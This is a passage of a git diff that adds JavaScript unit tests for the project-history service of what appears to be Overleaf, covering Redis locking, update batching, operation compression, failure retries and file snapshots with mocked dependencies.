true).should.equal(true) + }) + }) + }) + + describe('deleteLock', function () { + return beforeEach(function () { + beforeEach(function () { + return this.LockManager.deleteLock(this.key, this.callback) + }) + + it('should delete the lock in redis', function () { + return this.rclient.del.calledWith(key).should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + }) + + describe('getLock', function () { + describe('when the lock is not taken', function () { + beforeEach(function (done) { + this.LockManager._mocks.tryLock = sinon.stub().yields(null, true) + return this.LockManager.getLock(this.key, (...args) => { + this.callback(...Array.from(args || [])) + return done() + }) + }) + + it('should try to get the lock', function () { + return this.LockManager._mocks.tryLock + .calledWith(this.key) + .should.equal(true) + }) + + it('should only need to try once', function () { + return this.LockManager._mocks.tryLock.callCount.should.equal(1) + }) + + return it('should return the callback', function () { + return this.callback.calledWith(null).should.equal(true) + }) + }) + + describe('when the lock is initially set', function () { + beforeEach(function (done) { + this.LockManager._mocks.tryLock = sinon.stub() + this.LockManager._mocks.tryLock.onCall(0).yields(null, false) + this.LockManager._mocks.tryLock.onCall(1).yields(null, false) + this.LockManager._mocks.tryLock.onCall(2).yields(null, false) + this.LockManager._mocks.tryLock.onCall(3).yields(null, true) + + this.LockManager.getLock(this.key, (...args) => { + this.callback(...args) + return done() + }) + this.clock.runAll() + }) + + it('should call tryLock multiple times until free', function () { + this.LockManager._mocks.tryLock.callCount.should.equal(4) + }) + + return it('should return the callback', function () { + return this.callback.calledWith(null).should.equal(true) + }) + }) + + return describe('when the lock times out', function () { + beforeEach(function (done) { + const time = Date.now() + this.LockManager._mocks.tryLock = sinon.stub().yields(null, false) + this.LockManager.getLock(this.key, (...args) => { + this.callback(...args) + return done() + }) + this.clock.runAll() + }) + + return it('should return the callback with an error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + }) + + return describe('runWithLock', function () { + describe('with successful run', function () { + beforeEach(function () { + this.result = 'mock-result' + this.runner = sinon.stub().callsFake((extendLock, releaseLock) => { + return releaseLock(null, this.result) + }) + this.LockManager._mocks.getLock = sinon.stub().yields() + this.LockManager._mocks.releaseLock = sinon.stub().yields() + return this.LockManager.runWithLock( + this.key, + this.runner, + this.callback + ) + }) + + it('should get the lock', function () { + return this.LockManager._mocks.getLock + .calledWith(this.key) + .should.equal(true) + }) + + it('should run the passed function', function () { + return this.runner.called.should.equal(true) + }) + + it('should release the lock', function () { + return this.LockManager._mocks.releaseLock + .calledWith(this.key) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.calledWith(null, this.result).should.equal(true) + }) + }) + + describe('when the runner function returns an error', function () { + beforeEach(function () { + this.error = new Error('oops') + this.result = 'mock-result' + this.runner = sinon.stub().callsFake((extendLock, releaseLock) => { + return releaseLock(this.error, this.result) + }) + this.LockManager._mocks.getLock = sinon.stub().yields() + this.LockManager._mocks.releaseLock = sinon.stub().yields() + return this.LockManager.runWithLock( + this.key, + this.runner, + this.callback + ) + }) + + it('should release the lock', function () { + return this.LockManager._mocks.releaseLock + .calledWith(this.key) + .should.equal(true) + }) + + return it('should call the callback with the error', function () { + return this.callback + .calledWith(this.error, this.result) + .should.equal(true) + }) + }) + + describe('extending the lock whilst running', function () { + beforeEach(function () { + this.lockValue = 'lock-value' + this.LockManager._mocks.getLock = sinon + .stub() + .yields(null, this.lockValue) + this.LockManager._mocks.extendLock = sinon.stub().callsArg(2) + this.LockManager._mocks.releaseLock = sinon.stub().callsArg(2) + }) + + it('should extend the lock if the minimum interval has been passed', function (done) { + const runner = (extendLock, releaseLock) => { + this.clock.tick(this.LockManager.MIN_LOCK_EXTENSION_INTERVAL + 1) + return extendLock(releaseLock) + } + return this.LockManager.runWithLock(this.key, runner, () => { + this.LockManager._mocks.extendLock + .calledWith(this.key, this.lockValue) + .should.equal(true) + return done() + }) + }) + + return it('should not extend the lock if the minimum interval has not been passed', function (done) { + const runner = (extendLock, releaseLock) => { + this.clock.tick(this.LockManager.MIN_LOCK_EXTENSION_INTERVAL - 1) + return extendLock(releaseLock) + } + return this.LockManager.runWithLock(this.key, runner, () => { + this.LockManager._mocks.extendLock.callCount.should.equal(0) + return done() + }) + }) + }) + + describe('exceeding the lock ttl', function () { + beforeEach(function () { + this.lockValue = 'lock-value' + this.LockManager._mocks.getLock = sinon + .stub() + .yields(null, this.lockValue) + this.LockManager._mocks.extendLock = sinon.stub().yields() + this.LockManager._mocks.releaseLock = sinon.stub().yields() + return (this.LOCK_TTL_MS = this.LockManager.LOCK_TTL * 1000) + }) + + it("doesn't log if the ttl wasn't exceeded", function (done) { + const runner = (extendLock, releaseLock) => { + this.clock.tick(this.LOCK_TTL_MS - 1) + return releaseLock() + } + return this.LockManager.runWithLock(this.key, runner, () => { + this.logger.debug.callCount.should.equal(0) + return done() + }) + }) + + it("doesn't log if the lock was extended", function (done) { + const runner = (extendLock, releaseLock) => { + this.clock.tick(this.LOCK_TTL_MS - 1) + return extendLock(() => { + this.clock.tick(2) + return releaseLock() + }) + } + return this.LockManager.runWithLock(this.key, runner, () => { + this.logger.debug.callCount.should.equal(0) + return done() + }) + }) + + return it('logs that the excecution exceeded the lock', function (done) { + const runner = (extendLock, releaseLock) => { + this.clock.tick(this.LOCK_TTL_MS + 1) + return releaseLock() + } + return this.LockManager.runWithLock(this.key, runner, () => { + const slowExecutionError = new Error('slow execution during lock') + this.logger.debug + .calledWithMatch('exceeded lock timeout', { key: this.key }) + .should.equal(true) + return done() + }) + }) + }) + + return describe('releaseLock', function () { + describe('when the lock is current', function () { + beforeEach(function () { + this.rclient.eval.yields(null, 1) + return this.LockManager.releaseLock( + this.key, + this.lockValue, + this.callback + ) + }) + + it('should clear the data from redis', function () { + return this.rclient.eval + .calledWith( + this.LockManager.UNLOCK_SCRIPT, + 1, + this.key, + this.lockValue + ) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + return describe('when the lock has expired', function () { + beforeEach(function () { + this.rclient.eval.yields(null, 0) + return this.LockManager.releaseLock( + this.key, + this.lockValue, + this.callback + ) + }) + + return it('should return an error if the lock has expired', function () { + return this.callback + .calledWith( + sinon.match.has('message', 'tried to release timed out lock') + ) + .should.equal(true) + }) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/OperationsCompressor/OperationsCompressorTests.js b/services/project-history/test/unit/js/OperationsCompressor/OperationsCompressorTests.js new file mode 100644 index 0000000..1dc21c0 --- /dev/null +++ b/services/project-history/test/unit/js/OperationsCompressor/OperationsCompressorTests.js @@ -0,0 +1,76 @@ +import { expect } from 'chai' +import Core from 'overleaf-editor-core' +import * as OperationsCompressor from '../../../../app/js/OperationsCompressor.js' + +describe('OperationsCompressor', function () { + function edit(pathname, textOperationJsonObject) { + return Core.Operation.editFile( + pathname, + Core.TextOperation.fromJSON({ textOperation: textOperationJsonObject }) + ) + } + + it('collapses edit operations', function () { + const compressedOperations = OperationsCompressor.compressOperations([ + edit('main.tex', [3, 'foo', 17]), + edit('main.tex', [10, -5, 8]), + ]) + + expect(compressedOperations).to.have.length(1) + expect(compressedOperations[0]).to.deep.equal( + edit('main.tex', [3, 'foo', 4, -5, 8]) + ) + }) + + it('only collapses consecutive composable edit operations', function () { + const compressedOperations = OperationsCompressor.compressOperations([ + edit('main.tex', [3, 'foo', 17]), + edit('main.tex', [10, -5, 8]), + edit('not-main.tex', [3, 'foo', 17]), + edit('not-main.tex', [10, -5, 8]), + ]) + + expect(compressedOperations).to.have.length(2) + expect(compressedOperations[0]).to.deep.equal( + edit('main.tex', [3, 'foo', 4, -5, 8]) + ) + expect(compressedOperations[1]).to.deep.equal( + edit('not-main.tex', [3, 'foo', 4, -5, 8]) + ) + }) + + it("don't collapses text operations around non-composable operations", function () { + const compressedOperations = OperationsCompressor.compressOperations([ + edit('main.tex', [3, 'foo', 17]), + Core.Operation.moveFile('main.tex', 'new-main.tex'), + edit('new-main.tex', [10, -5, 8]), + edit('new-main.tex', [6, 'bar', 12]), + ]) + + expect(compressedOperations).to.have.length(3) + expect(compressedOperations[0]).to.deep.equal( + edit('main.tex', [3, 'foo', 17]) + ) + expect(compressedOperations[1].newPathname).to.deep.equal('new-main.tex') + expect(compressedOperations[2]).to.deep.equal( + edit('new-main.tex', [6, 'bar', 4, -5, 8]) + ) + }) + + it('handle empty operations', function () { + const compressedOperations = OperationsCompressor.compressOperations([]) + + expect(compressedOperations).to.have.length(0) + }) + + it('handle single operations', function () { + const compressedOperations = OperationsCompressor.compressOperations([ + edit('main.tex', [3, 'foo', 17]), + ]) + + expect(compressedOperations).to.have.length(1) + expect(compressedOperations[0]).to.deep.equal( + edit('main.tex', [3, 'foo', 17]) + ) + }) +}) diff --git a/services/project-history/test/unit/js/RedisManager/RedisManagerTests.js b/services/project-history/test/unit/js/RedisManager/RedisManagerTests.js new file mode 100644 index 0000000..53f9378 --- /dev/null +++ b/services/project-history/test/unit/js/RedisManager/RedisManagerTests.js @@ -0,0 +1,556 @@ +import { expect } from 'chai' +import sinon from 'sinon' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/RedisManager.js' + +describe('RedisManager', function () { + beforeEach(async function () { + this.rclient = new FakeRedis() + this.RedisWrapper = { + createClient: sinon.stub().returns(this.rclient), + } + this.Settings = { + redis: { + project_history: { + key_schema: { + projectHistoryOps({ project_id: projectId }) { + return `Project:HistoryOps:{${projectId}}` + }, + projectHistoryFirstOpTimestamp({ project_id: projectId }) { + return `ProjectHistory:FirstOpTimestamp:{${projectId}}` + }, + }, + }, + }, + } + + this.Metrics = { + timing: sinon.stub(), + summary: sinon.stub(), + globalGauge: sinon.stub(), + } + this.RedisManager = await esmock(MODULE_PATH, { + '@overleaf/redis-wrapper': this.RedisWrapper, + '@overleaf/settings': this.Settings, + '@overleaf/metrics': this.Metrics, + }) + + this.projectId = 'project-id-123' + this.batchSize = 100 + this.historyOpsKey = `Project:HistoryOps:{${this.projectId}}` + this.firstOpTimestampKey = `ProjectHistory:FirstOpTimestamp:{${this.projectId}}` + + this.updates = [ + { v: 42, op: ['a', 'b', 'c', 'd'] }, + { v: 45, op: ['e', 'f', 'g', 'h'] }, + ] + this.extraUpdates = [{ v: 100, op: ['i', 'j', 'k'] }] + this.rawUpdates = this.updates.map(update => JSON.stringify(update)) + this.extraRawUpdates = this.extraUpdates.map(update => + JSON.stringify(update) + ) + }) + + describe('getRawUpdatesBatch', function () { + it('gets a small number of updates in one batch', async function () { + const updates = makeUpdates(2) + const rawUpdates = makeRawUpdates(updates) + this.rclient.setList(this.historyOpsKey, rawUpdates) + const result = await this.RedisManager.promises.getRawUpdatesBatch( + this.projectId, + 100 + ) + expect(result).to.deep.equal({ rawUpdates, hasMore: false }) + }) + + it('gets a larger number of updates in several batches', async function () { + const updates = makeUpdates( + this.RedisManager.RAW_UPDATES_BATCH_SIZE * 2 + 12 + ) + const rawUpdates = makeRawUpdates(updates) + this.rclient.setList(this.historyOpsKey, rawUpdates) + const result = await this.RedisManager.promises.getRawUpdatesBatch( + this.projectId, + 5000 + ) + expect(result).to.deep.equal({ rawUpdates, hasMore: false }) + }) + + it("doesn't return more than the number of updates requested", async function () { + const updates = makeUpdates(100) + const rawUpdates = makeRawUpdates(updates) + this.rclient.setList(this.historyOpsKey, rawUpdates) + const result = await this.RedisManager.promises.getRawUpdatesBatch( + this.projectId, + 75 + ) + expect(result).to.deep.equal({ + rawUpdates: rawUpdates.slice(0, 75), + hasMore: true, + }) + }) + }) + + describe('parseDocUpdates', function () { + it('should return the parsed ops', function () { + const updates = makeUpdates(12) + const rawUpdates = makeRawUpdates(updates) + this.RedisManager.parseDocUpdates(rawUpdates).should.deep.equal(updates) + }) + }) + + describe('getUpdatesInBatches', function () { + beforeEach(function () { + this.runner = sinon.stub().resolves() + }) + + describe('single batch smaller than batch size', function () { + beforeEach(async function () { + this.updates = makeUpdates(2) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 3, + this.runner + ) + }) + + it('calls the runner once', function () { + this.runner.callCount.should.equal(1) + }) + + it('calls the runner with the updates', function () { + this.runner.should.have.been.calledWith(this.updates) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + + it('deletes the first op timestamp', function () { + expect(this.rclient.del).to.have.been.calledWith( + this.firstOpTimestampKey + ) + }) + }) + + describe('single batch at batch size', function () { + beforeEach(async function () { + this.updates = makeUpdates(123) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 123, + this.runner + ) + }) + + it('calls the runner once', function () { + this.runner.callCount.should.equal(1) + }) + + it('calls the runner with the updates', function () { + this.runner.should.have.been.calledWith(this.updates) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + + it('deletes the first op timestamp', function () { + expect(this.rclient.del).to.have.been.calledWith( + this.firstOpTimestampKey + ) + }) + }) + + describe('single batch exceeding size limit on updates', function () { + beforeEach(async function () { + this.updates = makeUpdates(2, [ + 'x'.repeat(this.RedisManager.RAW_UPDATE_SIZE_THRESHOLD), + ]) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 123, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(2) + }) + + it('calls the runner with the first update', function () { + this.runner + .getCall(0) + .should.have.been.calledWith(this.updates.slice(0, 1)) + }) + + it('calls the runner with the second update', function () { + this.runner + .getCall(1) + .should.have.been.calledWith(this.updates.slice(1)) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + }) + + describe('two batches with first update below and second update above the size limit on updates', function () { + beforeEach(async function () { + this.updates = makeUpdates(2, [ + 'x'.repeat(this.RedisManager.RAW_UPDATE_SIZE_THRESHOLD / 2), + ]) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 123, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(2) + }) + + it('calls the runner with the first update', function () { + this.runner + .getCall(0) + .should.have.been.calledWith(this.updates.slice(0, 1)) + }) + + it('calls the runner with the second update', function () { + this.runner + .getCall(1) + .should.have.been.calledWith(this.updates.slice(1)) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + }) + + describe('single batch exceeding op count limit on updates', function () { + beforeEach(async function () { + const ops = Array(this.RedisManager.MAX_UPDATE_OP_LENGTH + 1).fill('op') + this.updates = makeUpdates(2, { op: ops }) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 123, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(2) + }) + + it('calls the runner with the first update', function () { + this.runner + .getCall(0) + .should.have.been.calledWith(this.updates.slice(0, 1)) + }) + + it('calls the runner with the second update', function () { + this.runner + .getCall(1) + .should.have.been.calledWith(this.updates.slice(1)) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + }) + + describe('single batch exceeding doc content count', function () { + beforeEach(async function () { + this.updates = makeUpdates( + this.RedisManager.MAX_NEW_DOC_CONTENT_COUNT + 3, + { resyncDocContent: 123 } + ) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 123, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(2) + }) + + it('calls the runner with the first batch of updates', function () { + this.runner.should.have.been.calledWith( + this.updates.slice(0, this.RedisManager.MAX_NEW_DOC_CONTENT_COUNT) + ) + }) + + it('calls the runner with the second batch of updates', function () { + this.runner.should.have.been.calledWith( + this.updates.slice(this.RedisManager.MAX_NEW_DOC_CONTENT_COUNT) + ) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + }) + + describe('two batches with first update below and second update above the ops length limit on updates', function () { + beforeEach(async function () { + // set the threshold below the size of the first update + this.updates = makeUpdates(2, { op: ['op1', 'op2'] }) + this.updates[1].op = Array( + this.RedisManager.MAX_UPDATE_OP_LENGTH + 2 + ).fill('op') + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 123, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(2) + }) + + it('calls the runner with the first update', function () { + this.runner.should.have.been.calledWith(this.updates.slice(0, 1)) + }) + + it('calls the runner with the second update', function () { + this.runner.should.have.been.calledWith(this.updates.slice(1)) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + }) + + describe('two batches, one partial', function () { + beforeEach(async function () { + this.updates = makeUpdates(15) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 10, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(2) + }) + + it('calls the runner with the updates', function () { + this.runner + .getCall(0) + .should.have.been.calledWith(this.updates.slice(0, 10)) + this.runner + .getCall(1) + .should.have.been.calledWith(this.updates.slice(10)) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + }) + + describe('two full batches', function () { + beforeEach(async function () { + this.updates = makeUpdates(20) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 10, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(2) + }) + + it('calls the runner with the updates', function () { + this.runner + .getCall(0) + .should.have.been.calledWith(this.updates.slice(0, 10)) + this.runner + .getCall(1) + .should.have.been.calledWith(this.updates.slice(10)) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + }) + + describe('three full bathches, bigger than the Redis read batch size', function () { + beforeEach(async function () { + this.batchSize = this.RedisManager.RAW_UPDATES_BATCH_SIZE * 2 + this.updates = makeUpdates(this.batchSize * 3) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + await this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + this.batchSize, + this.runner + ) + }) + + it('calls the runner twice', function () { + this.runner.callCount.should.equal(3) + }) + + it('calls the runner with the updates', function () { + this.runner + .getCall(0) + .should.have.been.calledWith(this.updates.slice(0, this.batchSize)) + this.runner + .getCall(1) + .should.have.been.calledWith( + this.updates.slice(this.batchSize, this.batchSize * 2) + ) + this.runner + .getCall(2) + .should.have.been.calledWith(this.updates.slice(this.batchSize * 2)) + }) + + it('deletes the applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal([]) + }) + }) + + describe('error when first reading updates', function () { + beforeEach(async function () { + this.updates = makeUpdates(10) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + this.rclient.throwErrorOnLrangeCall(0) + await expect( + this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + 2, + this.runner + ) + ).to.be.rejected + }) + + it('does not delete any updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal( + this.rawUpdates + ) + }) + }) + + describe('error when reading updates for a second batch', function () { + beforeEach(async function () { + this.batchSize = this.RedisManager.RAW_UPDATES_BATCH_SIZE - 1 + this.updates = makeUpdates(this.RedisManager.RAW_UPDATES_BATCH_SIZE * 2) + this.rawUpdates = makeRawUpdates(this.updates) + this.rclient.setList(this.historyOpsKey, this.rawUpdates) + this.rclient.throwErrorOnLrangeCall(1) + await expect( + this.RedisManager.promises.getUpdatesInBatches( + this.projectId, + this.batchSize, + this.runner + ) + ).to.be.rejected + }) + + it('calls the runner with the first batch of updates', function () { + this.runner.should.have.been.calledOnce + this.runner + .getCall(0) + .should.have.been.calledWith(this.updates.slice(0, this.batchSize)) + }) + + it('deletes only the first batch of applied updates', function () { + expect(this.rclient.getList(this.historyOpsKey)).to.deep.equal( + this.rawUpdates.slice(this.batchSize) + ) + }) + }) + }) +}) + +class FakeRedis { + constructor() { + this.data = new Map() + this.del = sinon.stub() + this.lrangeCallCount = -1 + } + + setList(key, list) { + this.data.set(key, list) + } + + getList(key) { + return this.data.get(key) + } + + throwErrorOnLrangeCall(callNum) { + this.lrangeCallThrowingError = callNum + } + + async lrange(key, start, stop) { + this.lrangeCallCount += 1 + if ( + this.lrangeCallThrowingError != null && + this.lrangeCallThrowingError === this.lrangeCallCount + ) { + throw new Error('LRANGE failed!') + } + const list = this.data.get(key) ?? [] + return list.slice(start, stop + 1) + } + + async lrem(key, count, elementToRemove) { + expect(count).to.be.greaterThan(0) + const original = this.data.get(key) ?? [] + const filtered = original.filter(element => { + if (count > 0 && element === elementToRemove) { + count-- + return false + } + return true + }) + this.data.set(key, filtered) + } + + async exec() { + // Nothing to do + } + + multi() { + return this + } +} + +function makeUpdates(updateCount, extraFields = {}) { + const updates = [] + for (let i = 0; i < updateCount; i++) { + updates.push({ v: i, ...extraFields }) + } + return updates +} + +function makeRawUpdates(updates) { + return updates.map(JSON.stringify) +} diff --git a/services/project-history/test/unit/js/RetryManager/RetryManagerTests.js b/services/project-history/test/unit/js/RetryManager/RetryManagerTests.js new file mode 100644 index 0000000..e8443aa --- /dev/null +++ b/services/project-history/test/unit/js/RetryManager/RetryManagerTests.js @@ -0,0 +1,145 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import { strict as esmock } from 'esmock' +const { ObjectId } = mongodb + +const MODULE_PATH = '../../../../app/js/RetryManager.js' + +describe('RetryManager', function () { + beforeEach(async function () { + this.projectId1 = new ObjectId().toString() + this.projectId2 = new ObjectId().toString() + this.projectId3 = new ObjectId().toString() + this.projectId4 = new ObjectId().toString() + this.historyId = 12345 + + this.WebApiManager = { + promises: { + getHistoryId: sinon.stub().resolves(this.historyId), + }, + } + this.RedisManager = { + promises: { + countUnprocessedUpdates: sinon.stub().resolves(0), + }, + } + this.ErrorRecorder = { + promises: { + getFailedProjects: sinon.stub().resolves([ + { + project_id: this.projectId1, + error: 'Error: Timeout', + attempts: 1, + }, + { + project_id: this.projectId2, + error: 'Error: Timeout', + attempts: 25, + }, + { + project_id: this.projectId3, + error: 'sync ongoing', + attempts: 10, + resyncAttempts: 1, + }, + { + project_id: this.projectId4, + error: 'sync ongoing', + attempts: 10, + resyncAttempts: 2, + }, + ]), + getFailureRecord: sinon.stub().resolves(), + }, + } + this.SyncManager = { + promises: { + startResync: sinon.stub().resolves(), + startHardResync: sinon.stub().resolves(), + }, + } + this.UpdatesProcessor = { + promises: { + processUpdatesForProject: sinon.stub().resolves(), + }, + } + this.settings = { + redis: { + lock: { + key_schema: { + projectHistoryLock({ projectId }) { + return `ProjectHistoryLock:${projectId}` + }, + }, + }, + }, + } + this.request = {} + this.RetryManager = await esmock(MODULE_PATH, { + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/RedisManager.js': this.RedisManager, + '../../../../app/js/ErrorRecorder.js': this.ErrorRecorder, + '../../../../app/js/SyncManager.js': this.SyncManager, + '../../../../app/js/UpdatesProcessor.js': this.UpdatesProcessor, + '@overleaf/settings': this.settings, + request: this.request, + }) + }) + + describe('RetryManager', function () { + describe('for a soft failure', function () { + beforeEach(async function () { + await this.RetryManager.promises.retryFailures({ failureType: 'soft' }) + }) + + it('should flush the queue', function () { + expect( + this.UpdatesProcessor.promises.processUpdatesForProject + ).to.have.been.calledWith(this.projectId1) + }) + }) + + describe('for a hard failure', function () { + beforeEach(async function () { + await this.RetryManager.promises.retryFailures({ failureType: 'hard' }) + }) + + it('should check the overleaf project id', function () { + expect( + this.WebApiManager.promises.getHistoryId + ).to.have.been.calledWith(this.projectId2) + }) + + it("should start a soft resync when a resync hasn't been tried yet", function () { + expect(this.SyncManager.promises.startResync).to.have.been.calledWith( + this.projectId2 + ) + }) + + it('should start a hard resync when a resync has already been tried', function () { + expect( + this.SyncManager.promises.startHardResync + ).to.have.been.calledWith(this.projectId3) + }) + + it("shouldn't try a resync after a hard resync attempt failed", function () { + expect( + this.SyncManager.promises.startHardResync + ).not.to.have.been.calledWith(this.projectId4) + }) + + it('should count the unprocessed updates', function () { + expect( + this.RedisManager.promises.countUnprocessedUpdates + ).to.have.been.calledWith(this.projectId2) + }) + + it('should check the failure record', function () { + expect( + this.ErrorRecorder.promises.getFailureRecord + ).to.have.been.calledWith(this.projectId2) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/SnapshotManager/SnapshotManagerTests.js b/services/project-history/test/unit/js/SnapshotManager/SnapshotManagerTests.js new file mode 100644 index 0000000..d6c5205 --- /dev/null +++ b/services/project-history/test/unit/js/SnapshotManager/SnapshotManagerTests.js @@ -0,0 +1,1103 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' +import Core from 'overleaf-editor-core' +import * as Errors from '../../../../app/js/Errors.js' + +const MODULE_PATH = '../../../../app/js/SnapshotManager.js' + +describe('SnapshotManager', function () { + beforeEach(async function () { + this.HistoryStoreManager = { + getBlobStore: sinon.stub(), + promises: { + getChunkAtVersion: sinon.stub(), + getMostRecentChunk: sinon.stub(), + getProjectBlobStream: sinon.stub(), + }, + } + this.WebApiManager = { + promises: { + getHistoryId: sinon.stub(), + }, + } + this.SnapshotManager = await esmock(MODULE_PATH, { + 'overleaf-editor-core': Core, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/Errors.js': Errors, + }) + this.projectId = 'project-id-123' + this.historyId = 'ol-project-id-123' + this.callback = sinon.stub() + }) + + describe('getFileSnapshotStream', function () { + beforeEach(function () { + this.WebApiManager.promises.getHistoryId.resolves(this.historyId) + this.ranges = { + comments: [], + trackedChanges: [ + { + range: { pos: 4, length: 6 }, + tracking: { + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + }, + }, + { + range: { pos: 35, length: 5 }, + tracking: { + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + }, + }, + ], + } + this.HistoryStoreManager.promises.getChunkAtVersion.resolves({ + chunk: { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + stringLength: 41, + }, + 'file_with_ranges.tex': { + hash: '5d2781d78fa5a97b7bafa849fe933dfc9dc93eba', + rangesHash: '73061952d41ce54825e2fc1c36b4cf736d5fb62f', + stringLength: 41, + }, + 'binary.png': { + hash: 'c6654ea913979e13e22022653d284444f284a172', + byteLength: 41, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [41, '\n\nSeven eight'], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [54, ' nine'], + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + authors: [ + { + id: 31, + email: 'james.allen@overleaf.com', + name: 'James', + }, + ], + }, + }) + }) + + describe('of a text file with no tracked changes', function () { + beforeEach(async function () { + this.HistoryStoreManager.getBlobStore.withArgs(this.historyId).returns({ + getString: (this.getString = sinon.stub().resolves( + `\ +Hello world + +One two three + +Four five six\ +`.replace(/^\t/g, '') + )), + getObject: sinon.stub().rejects(), + }) + this.stream = await this.SnapshotManager.promises.getFileSnapshotStream( + this.projectId, + 5, + 'main.tex' + ) + }) + + it('should get the overleaf id', function () { + this.WebApiManager.promises.getHistoryId + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the chunk', function () { + this.HistoryStoreManager.promises.getChunkAtVersion + .calledWith(this.projectId, this.historyId, 5) + .should.equal(true) + }) + + it('should get the blob of the starting snapshot', function () { + this.getString + .calledWith('35c9bd86574d61dcadbce2fdd3d4a0684272c6ea') + .should.equal(true) + }) + + it('should return a string stream with the text content', function () { + expect(this.stream.read().toString()).to.equal( + `\ +Hello world + +One two three + +Four five six + +Seven eight nine\ +`.replace(/^\t/g, '') + ) + }) + + describe('on blob store error', function () { + beforeEach(function () { + this.error = new Error('ESOCKETTIMEDOUT') + this.HistoryStoreManager.getBlobStore + .withArgs(this.historyId) + .returns({ + getString: sinon.stub().rejects(this.error), + getObject: sinon.stub().rejects(this.error), + }) + }) + + it('should call back with error', async function () { + await expect( + this.SnapshotManager.promises.getFileSnapshotStream( + this.projectId, + 5, + 'main.tex' + ) + ).to.be.rejectedWith(this.error) + }) + }) + }) + + describe('of a text file with tracked changes', function () { + beforeEach(async function () { + this.HistoryStoreManager.getBlobStore.withArgs(this.historyId).returns({ + getString: (this.getString = sinon + .stub() + .resolves('the quick brown fox jumps over the lazy dog')), + getObject: (this.getObject = sinon.stub().resolves(this.ranges)), + }) + this.stream = await this.SnapshotManager.promises.getFileSnapshotStream( + this.projectId, + 5, + 'file_with_ranges.tex' + ) + }) + + it('should get the overleaf id', function () { + 